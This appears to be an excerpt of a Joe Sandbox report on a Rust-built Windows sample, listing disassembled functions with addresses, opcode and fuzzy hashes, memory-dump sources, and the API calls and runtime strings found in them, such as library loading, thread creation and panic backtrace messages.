                                        • Instruction ID: d611f949f5a4e9897e09a50e03d2e39cb2e5ef50d0d13e16308e770942964a06
                                        • Opcode Fuzzy Hash: b34943c36c60378abf8c1f298144ab8f735b3069bf5e9b792ee67a0488236842
                                        • Instruction Fuzzy Hash: 8D02E262F1865647FB40AF26F4843B9A675BB447A8F908530DE3D137D6EF3CA4898390
                                        Function 00007FF7F41323B0 Relevance: .5, Instructions: 499COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85e6ecfb64c365217a0db7b32e2770df33e9e3503e4a9046a8bbb8d6648499f7
                                        • Instruction ID: 58fe867389d722eb68c2f51a5e0be53817fa6d8473a1fa9742388653cb6e94ec
                                        • Opcode Fuzzy Hash: 85e6ecfb64c365217a0db7b32e2770df33e9e3503e4a9046a8bbb8d6648499f7
                                        • Instruction Fuzzy Hash: 36120752F18BE147F3527F39F8822B8E750BB5A3D4F445334EEA8529D6DB3C924192A0
                                        Function 00007FF7F4136080 Relevance: .4, Instructions: 365COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b83194662346546361f741b4b979d63a3320962cad3683241e97a7940b826e0
                                        • Instruction ID: 427c1e15e4e861e5853cc387fecce6c218fdd0144dd92aeef8ea82fd92e98fdf
                                        • Opcode Fuzzy Hash: 9b83194662346546361f741b4b979d63a3320962cad3683241e97a7940b826e0
                                        • Instruction Fuzzy Hash: D1C12522F1C6A583FB25DF22E954AB9A651B711B94FD08230DE6E43BC0DF3CE551A390
                                        Function 00007FF7F4129AF0 Relevance: .4, Instructions: 351COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa981abc52c7698188d00a9c32d1fcc652a5a437a41808e292dde5593fa20b64
                                        • Instruction ID: 8a80626efd43d7588595087475d96415c03a88dcd9008e809eeda9a1a27e2ffc
                                        • Opcode Fuzzy Hash: aa981abc52c7698188d00a9c32d1fcc652a5a437a41808e292dde5593fa20b64
                                        • Instruction Fuzzy Hash: 08C16DA2F2C2D686F7619D6EF4807BAEA815702764FD44330C97D571D0CB3C9B9293A0
                                        Function 00007FF7F4135A90 Relevance: .3, Instructions: 337COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b35546d95137ae1cd189ec2b2a78a858d589c4872b4ecaf7bc022615416439d
                                        • Instruction ID: 4b49d1ce28432f1f0ed060c84c10ee46c84327cf910818f4abd037524f4dc868
                                        • Opcode Fuzzy Hash: 9b35546d95137ae1cd189ec2b2a78a858d589c4872b4ecaf7bc022615416439d
                                        • Instruction Fuzzy Hash: D1C1B086E2D76603F723573BA4412B489405F63FA4B81D336FC7E31BE1EB25E6426254
                                        Function 00007FF7F411E060 Relevance: .3, Instructions: 334COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e7b30ffdeeab9917f631e5aa7c20e436b95b569e0a40d79cca50245ddd54367
                                        • Instruction ID: ed11a1fd3268d4ef9506eb98e9720f7999d8825f61d6fdf71ad1e838bfdd958e
                                        • Opcode Fuzzy Hash: 9e7b30ffdeeab9917f631e5aa7c20e436b95b569e0a40d79cca50245ddd54367
                                        • Instruction Fuzzy Hash: BAC12362E18B5243EB259F92F19027BD7B5BB817A4F845531DA7E03AE0DF3CE54082A0
                                        Function 00007FF7F4132C20 Relevance: .3, Instructions: 330COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37b4546647432975a8fffa9094ad510d30eedb15b9c04380023069877228475d
                                        • Instruction ID: 5b1ac47e728301e1b0ea4e722e160588c16566eec55497a22a9afc6a70e184a4
                                        • Opcode Fuzzy Hash: 37b4546647432975a8fffa9094ad510d30eedb15b9c04380023069877228475d
                                        • Instruction Fuzzy Hash: BDD12A52F14FE546F3526F39A8432B9E320BF9A3D4F405334EEE462D96DF3892429294
                                        Function 00007FF7F4139318 Relevance: .0, Instructions: 2COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4be44de7018001e7f1b066c3ac6d0d446ad464c09974f8235d1753243f23d6b6
                                        • Instruction ID: 3efcdc14927a0562eef1e4efe0e200ede60e93aa95f269a068cb948909ca5648
                                        • Opcode Fuzzy Hash: 4be44de7018001e7f1b066c3ac6d0d446ad464c09974f8235d1753243f23d6b6
                                        • Instruction Fuzzy Hash: ACA00161D1C90296E705AF12F990070A620EB55B10FC00071C16D414F0AF3CA440D2A0
                                        Function 00007FF7F413A73C Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 310COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: BlockFrameHandler3::Unwindterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStateabortstd::bad_alloc::bad_alloc
                                        • String ID: csm$csm$csm
                                        • API String ID: 9366333-393685449
                                        • Opcode ID: c0dbc96ef5fb765a35e6a1437dba457f804b00cf968a936fcde4d1b713db04b2
                                        • Instruction ID: 1becd0b338e914db3f24b50ed45da77d6875134e274f04d06a4398b0745c155c
                                        • Opcode Fuzzy Hash: c0dbc96ef5fb765a35e6a1437dba457f804b00cf968a936fcde4d1b713db04b2
                                        • Instruction Fuzzy Hash: 22D17022D087418BEB20EF66E4803BDB7A4FB45788F504235DAAD5779ADF38E481D790
                                        Function 00007FF7F412B060 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 220libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B098
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B0D0
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B10A
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B170
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B1A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace
                                        • API String ID: 2190909847-3384281969
                                        • Opcode ID: 5573b4725ce5cc75251cd0737fc1eca949bec2c587926e98fe881261ec675c98
                                        • Instruction ID: afff5e6333a6bb920d179b27c8d46095533c7cb2bb45b80f038e06c469587bd0
                                        • Opcode Fuzzy Hash: 5573b4725ce5cc75251cd0737fc1eca949bec2c587926e98fe881261ec675c98
                                        • Instruction Fuzzy Hash: 6FB17131E08AC18AE7319F16F8817E9A7A4FF04798F844135EA5D47BA8DF789395C390
                                        Function 00007FF7F4129F80 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 422COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FullNamePath
                                        • String ID: \\?\$\\?\UNC\
                                        • API String ID: 2482867836-3019864461
                                        • Opcode ID: 47e21512551a261b91feff97e1dbdfc78e20626df7c3dbaf9e0f79693cd385e6
                                        • Instruction ID: 47ad20829f622b3b606acd45dd197925b5ee23b19d00266dd6d07cb3155c3390
                                        • Opcode Fuzzy Hash: 47e21512551a261b91feff97e1dbdfc78e20626df7c3dbaf9e0f79693cd385e6
                                        • Instruction Fuzzy Hash: 81029662E08692C7EB70AF16E5843B9A365FB04BD4F808236DA6C976C4DF38D7858354
                                        Function 00007FF7F4126B6E Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Handle$CloseErrorLast$CreateCurrentDuplicateProcessThread
                                        • String ID: RUST_MIN_STACK$failed to spawn thread
                                        • API String ID: 4152547513-917136298
                                        • Opcode ID: b9022e5d87f67925ce0ea4183ce08df445dda906ad3cb8caf0b04fd543611c86
                                        • Instruction ID: fb94a9e6ca335c54d4d1c123b1b5fc4380f9ba8b400ebfcad6e993ae2c773f0f
                                        • Opcode Fuzzy Hash: b9022e5d87f67925ce0ea4183ce08df445dda906ad3cb8caf0b04fd543611c86
                                        • Instruction Fuzzy Hash: FED15122E08B81CAEB10EF66E8903BD67A1FB55798F804135DA5D437D9DF38D584C3A0
                                        Function 00007FF7F411ABA0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF7F411AF85
                                        • stack backtrace:, xrefs: 00007FF7F411AC49
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookup
                                        • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                        • API String ID: 2800785878-3192684347
                                        • Opcode ID: 92a787d140059c6739102b84400e6c34c6f864ac35a1194e2f8a9f4b27341794
                                        • Instruction ID: 4966b5d359d10c7851101fb5d948e1806b7f5f9cb585a0192900f762d00525bc
                                        • Opcode Fuzzy Hash: 92a787d140059c6739102b84400e6c34c6f864ac35a1194e2f8a9f4b27341794
                                        • Instruction Fuzzy Hash: 4BB13D62A08FC189EB719F25EC803EA77A4FB4579DF440126CA5C4BB99EF38D245C750
                                        Function 00007FF7F4120D20 Relevance: 10.7, APIs: 7, Instructions: 185COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseCreateErrorEventHandleLastMultipleObjectsOverlappedResultWait
                                        • String ID:
                                        • API String ID: 1266231692-0
                                        • Opcode ID: b84400ee7e79c55e95b58c046b33fc67579e9979e9ec7a4a9ffbca3d45e0d5bb
                                        • Instruction ID: fac6866ca39404c4d0e220d0fd83e1fbac09187f8b4af1b295e0cba060a5cdf0
                                        • Opcode Fuzzy Hash: b84400ee7e79c55e95b58c046b33fc67579e9979e9ec7a4a9ffbca3d45e0d5bb
                                        • Instruction Fuzzy Hash: 55816022E08B55CAFB10DF66E8803AC6B60FB14798F404631EE2C97BD9DF38D5918390
                                        Function 00007FF7F411B3C0 Relevance: 10.6, APIs: 7, Instructions: 148fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseHandle$FileSleep$ErrorLastReadWrite
                                        • String ID:
                                        • API String ID: 4082512061-0
                                        • Opcode ID: 0d8f85834ed94a0328527500f3fbf17a6b9c570b74d9ee048fd7e452b0836797
                                        • Instruction ID: 1c7bb9f322f44f9dcf662a2a7c5a691801eba306caaa63fdfe6ab9fe577b2556
                                        • Opcode Fuzzy Hash: 0d8f85834ed94a0328527500f3fbf17a6b9c570b74d9ee048fd7e452b0836797
                                        • Instruction Fuzzy Hash: 1C51B432A04AC296E731AF26FC417F96764FB447A8F844231EE6D06BD8DF789285D350
                                        Function 00007FF7F413BA3C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BAC1
                                        • GetLastError.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BACF
                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BAF9
                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BB67
                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BB73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                        • String ID: api-ms-
                                        • API String ID: 2559590344-2084034818
                                        • Opcode ID: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                        • Instruction ID: 61055ff27fe01eb23f812a91b36d6e77cc79037a95b076727ed86bca4c6fbd72
                                        • Opcode Fuzzy Hash: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                        • Instruction Fuzzy Hash: 7431C021F1AA4283EF61AF03F480675A694BF45BA4F990534DDBD4B3D9FE3CE54082A0
                                        Function 00007FF7F4127A00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 197COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Handle$CloseConsoleErrorLastMode
                                        • String ID: called `Result::unwrap()` on an `Err` value
                                        • API String ID: 1170577072-2333694755
                                        • Opcode ID: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                        • Instruction ID: aaa259d95dd0ac24781ccb9d557bfba7ab4f9c9ccd84c6ee9d21ba75549b5328
                                        • Opcode Fuzzy Hash: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                        • Instruction Fuzzy Hash: 09817461E086528AFB11AF72F8803F9A761AB06798F844131DE7D526D5DF3CD289C3A0
                                        Function 00007FF7F413AFBC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_recordabort
                                        • String ID: csm$csm
                                        • API String ID: 4198837600-3733052814
                                        • Opcode ID: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                        • Instruction ID: 1cb86b4801a13011e5699e685d8db0a08a3f59be1eb08a591ae4a9cd8cc34de8
                                        • Opcode Fuzzy Hash: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                        • Instruction Fuzzy Hash: C9518F32E0828687EB74AF12F484278B7A0EB55B84F944135DAAC47BD6DF3CE850D790
                                        Function 00007FF7F413AC0C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CallEncodePointerTranslatorabort
                                        • String ID: MOC$RCC
                                        • API String ID: 292945357-2084237596
                                        • Opcode ID: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                        • Instruction ID: d3c1599395fb5010b9bc6de02951e1cf5fc8638fb9a50c4b3a5dfbb0312f8d4c
                                        • Opcode Fuzzy Hash: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                        • Instruction Fuzzy Hash: FE617D32908BC586DB209F16F4807AAB7A0FB95BD4F444235EAAC03B95DF7CE090DB50
                                        Function 00007FF7F4128BB0 Relevance: 7.8, APIs: 5, Instructions: 257COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
